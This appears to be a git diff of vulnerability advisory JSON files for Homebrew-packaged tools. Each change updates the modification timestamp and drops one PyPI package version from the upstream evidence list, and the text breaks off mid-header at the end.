db7dff41dc..abf5a6d4a6 100644 --- a/advisories/BREW-mcpm-CVE-2026-41479.json +++ b/advisories/BREW-mcpm-CVE-2026-41479.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-41479", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-w8p2-r796-3vmq", "CVE-2026-41479", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-42561.json b/advisories/BREW-mcpm-CVE-2026-42561.json index cfdb0ab7c2..2a6f6d92a1 100644 --- a/advisories/BREW-mcpm-CVE-2026-42561.json +++ b/advisories/BREW-mcpm-CVE-2026-42561.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-42561", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-pp6c-gr5w-3c5g", "CVE-2026-42561", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-44431.json b/advisories/BREW-mcpm-CVE-2026-44431.json index 5fea586cb9..d8bea36c75 100644 --- a/advisories/BREW-mcpm-CVE-2026-44431.json +++ b/advisories/BREW-mcpm-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-44431", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-44432.json b/advisories/BREW-mcpm-CVE-2026-44432.json index 55203ab5f7..cf4a7e0dba 100644 --- a/advisories/BREW-mcpm-CVE-2026-44432.json +++ b/advisories/BREW-mcpm-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-44432", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-44681.json b/advisories/BREW-mcpm-CVE-2026-44681.json index 7d835fb47e..2f02aa4168 100644 --- a/advisories/BREW-mcpm-CVE-2026-44681.json +++ b/advisories/BREW-mcpm-CVE-2026-44681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-44681", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-r95x-qfjj-fjj2", "CVE-2026-44681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-4539.json b/advisories/BREW-mcpm-CVE-2026-4539.json index 5b2e119dca..140813ca51 100644 --- a/advisories/BREW-mcpm-CVE-2026-4539.json +++ b/advisories/BREW-mcpm-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-4539", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-45409.json b/advisories/BREW-mcpm-CVE-2026-45409.json index 850dbf5dd5..19630992f1 100644 --- a/advisories/BREW-mcpm-CVE-2026-45409.json +++ b/advisories/BREW-mcpm-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-45409", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48522.json b/advisories/BREW-mcpm-CVE-2026-48522.json index a67948b48a..0fc1408bff 100644 --- a/advisories/BREW-mcpm-CVE-2026-48522.json +++ b/advisories/BREW-mcpm-CVE-2026-48522.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48522", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-993g-76c3-p5m4", "CVE-2026-48522", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48523.json b/advisories/BREW-mcpm-CVE-2026-48523.json index 911a70607f..a6e1f09ac4 100644 --- a/advisories/BREW-mcpm-CVE-2026-48523.json +++ b/advisories/BREW-mcpm-CVE-2026-48523.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48523", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-jq35-7prp-9v3f", "CVE-2026-48523", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48524.json b/advisories/BREW-mcpm-CVE-2026-48524.json index f074385295..f207ce7150 100644 --- a/advisories/BREW-mcpm-CVE-2026-48524.json +++ b/advisories/BREW-mcpm-CVE-2026-48524.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48524", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-fhv5-28vv-h8m8", "CVE-2026-48524", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48525.json b/advisories/BREW-mcpm-CVE-2026-48525.json index 8d94c6f72d..91c9cf069f 100644 --- a/advisories/BREW-mcpm-CVE-2026-48525.json +++ b/advisories/BREW-mcpm-CVE-2026-48525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48525", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-w7vc-732c-9m39", "CVE-2026-48525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48526.json b/advisories/BREW-mcpm-CVE-2026-48526.json index 194d13b169..a53224d58e 100644 --- a/advisories/BREW-mcpm-CVE-2026-48526.json +++ b/advisories/BREW-mcpm-CVE-2026-48526.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48526", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-xgmm-8j9v-c9wx", "CVE-2026-48526", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48710.json b/advisories/BREW-mcpm-CVE-2026-48710.json index eba29eaf0d..b194954319 100644 --- a/advisories/BREW-mcpm-CVE-2026-48710.json +++ b/advisories/BREW-mcpm-CVE-2026-48710.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48710", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-29T09:17:13Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-86qp-5c8j-p5mr", "CVE-2026-48710", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48817.json b/advisories/BREW-mcpm-CVE-2026-48817.json index b0c3a7882c..fb1e8bf9a5 100644 --- a/advisories/BREW-mcpm-CVE-2026-48817.json +++ b/advisories/BREW-mcpm-CVE-2026-48817.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48817", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-x746-7m8f-x49c", "CVE-2026-48817", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48818.json b/advisories/BREW-mcpm-CVE-2026-48818.json index 676a7f0b2b..e7bf02c238 100644 --- a/advisories/BREW-mcpm-CVE-2026-48818.json +++ b/advisories/BREW-mcpm-CVE-2026-48818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48818", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-wqp7-x3pw-xc5r", "CVE-2026-48818", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48990.json b/advisories/BREW-mcpm-CVE-2026-48990.json index c2e3f1f2dd..ad7ccbdef7 100644 --- a/advisories/BREW-mcpm-CVE-2026-48990.json +++ b/advisories/BREW-mcpm-CVE-2026-48990.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48990", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-wphv-vfrh-23q5", "CVE-2026-48990", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "joserfc", - "subject_version": "1.7.1", - "key": "pkg:pypi/joserfc@1.7.1", - "resource": "joserfc" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-49852.json b/advisories/BREW-mcpm-CVE-2026-49852.json index 3129c1cd11..d34cf2752d 100644 --- a/advisories/BREW-mcpm-CVE-2026-49852.json +++ b/advisories/BREW-mcpm-CVE-2026-49852.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-49852", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-gg9x-qcx2-xmrh", "CVE-2026-49852", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "joserfc", - "subject_version": "1.7.1", - "key": "pkg:pypi/joserfc@1.7.1", - "resource": "joserfc" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-52869.json b/advisories/BREW-mcpm-CVE-2026-52869.json index 68a35b9091..9a00affd67 100644 --- a/advisories/BREW-mcpm-CVE-2026-52869.json +++ b/advisories/BREW-mcpm-CVE-2026-52869.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-52869", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-jpw9-pfvf-9f58", "CVE-2026-52869", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.27.2", - "key": "pkg:pypi/mcp@1.27.2", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-52870.json b/advisories/BREW-mcpm-CVE-2026-52870.json index 829bc2f2f4..b538898d1d 100644 --- a/advisories/BREW-mcpm-CVE-2026-52870.json +++ b/advisories/BREW-mcpm-CVE-2026-52870.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-52870", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-hvrp-rf83-w775", "CVE-2026-52870", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.27.2", - "key": "pkg:pypi/mcp@1.27.2", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-53537.json b/advisories/BREW-mcpm-CVE-2026-53537.json index 71bfadc670..9a922504ad 100644 --- a/advisories/BREW-mcpm-CVE-2026-53537.json +++ b/advisories/BREW-mcpm-CVE-2026-53537.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-53537", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-vffw-93wf-4j4q", "CVE-2026-53537", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-53538.json b/advisories/BREW-mcpm-CVE-2026-53538.json index a775f68cbf..4aa51b21a0 100644 --- a/advisories/BREW-mcpm-CVE-2026-53538.json +++ b/advisories/BREW-mcpm-CVE-2026-53538.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-53538", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-6jv3-5f52-599m", "CVE-2026-53538", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-53539.json b/advisories/BREW-mcpm-CVE-2026-53539.json index 07a518347c..60fa36d88a 100644 --- a/advisories/BREW-mcpm-CVE-2026-53539.json +++ b/advisories/BREW-mcpm-CVE-2026-53539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-53539", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-5rvq-cxj2-64vf", "CVE-2026-53539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-53540.json b/advisories/BREW-mcpm-CVE-2026-53540.json index 49da1ac765..78aae672df 100644 --- a/advisories/BREW-mcpm-CVE-2026-53540.json +++ b/advisories/BREW-mcpm-CVE-2026-53540.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-53540", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-v9pg-7xvm-68hf", "CVE-2026-53540", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-54282.json b/advisories/BREW-mcpm-CVE-2026-54282.json index 8a728378de..07434e5bed 100644 --- a/advisories/BREW-mcpm-CVE-2026-54282.json +++ b/advisories/BREW-mcpm-CVE-2026-54282.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-54282", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-jp82-jpqv-5vv3", "CVE-2026-54282", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-54283.json b/advisories/BREW-mcpm-CVE-2026-54283.json index f64875c223..fe060ad08a 100644 --- a/advisories/BREW-mcpm-CVE-2026-54283.json +++ b/advisories/BREW-mcpm-CVE-2026-54283.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-54283", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-82w8-qh3p-5jfq", "CVE-2026-54283", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-59950.json b/advisories/BREW-mcpm-CVE-2026-59950.json index dd2b035e08..82cd649cc9 100644 --- a/advisories/BREW-mcpm-CVE-2026-59950.json +++ b/advisories/BREW-mcpm-CVE-2026-59950.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-59950", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-vj7q-gjh5-988w", "CVE-2026-59950", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.27.2", - "key": "pkg:pypi/mcp@1.27.2", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2013-1633.json b/advisories/BREW-osc-cli-CVE-2013-1633.json index 7c478f6098..dba6941c11 100644 --- a/advisories/BREW-osc-cli-CVE-2013-1633.json +++ b/advisories/BREW-osc-cli-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2013-1633", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2014-1829.json b/advisories/BREW-osc-cli-CVE-2014-1829.json index aea4d22839..21412f0589 100644 --- a/advisories/BREW-osc-cli-CVE-2014-1829.json +++ b/advisories/BREW-osc-cli-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2014-1829", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2014-1830.json b/advisories/BREW-osc-cli-CVE-2014-1830.json index 440d06d46c..460fcaa252 100644 --- a/advisories/BREW-osc-cli-CVE-2014-1830.json +++ b/advisories/BREW-osc-cli-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2014-1830", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2015-2296.json b/advisories/BREW-osc-cli-CVE-2015-2296.json index f48a57606f..35c6c0284e 100644 --- a/advisories/BREW-osc-cli-CVE-2015-2296.json +++ b/advisories/BREW-osc-cli-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2015-2296", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2016-9015.json b/advisories/BREW-osc-cli-CVE-2016-9015.json index 9265359904..31d00ddca2 100644 --- a/advisories/BREW-osc-cli-CVE-2016-9015.json +++ b/advisories/BREW-osc-cli-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2016-9015", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2018-18074.json b/advisories/BREW-osc-cli-CVE-2018-18074.json index 0809eb971c..73b0a2dbcc 100644 --- a/advisories/BREW-osc-cli-CVE-2018-18074.json +++ b/advisories/BREW-osc-cli-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2018-18074", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2018-20060.json b/advisories/BREW-osc-cli-CVE-2018-20060.json index 63bbe6768f..394ac6ce88 100644 --- a/advisories/BREW-osc-cli-CVE-2018-20060.json +++ b/advisories/BREW-osc-cli-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2018-20060", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2018-25091.json b/advisories/BREW-osc-cli-CVE-2018-25091.json index 777ed45464..7327c51acc 100644 --- a/advisories/BREW-osc-cli-CVE-2018-25091.json +++ b/advisories/BREW-osc-cli-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2018-25091", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2019-11236.json b/advisories/BREW-osc-cli-CVE-2019-11236.json index f9db17c2dd..b240b212e9 100644 --- a/advisories/BREW-osc-cli-CVE-2019-11236.json +++ b/advisories/BREW-osc-cli-CVE-2019-11236.json @@ 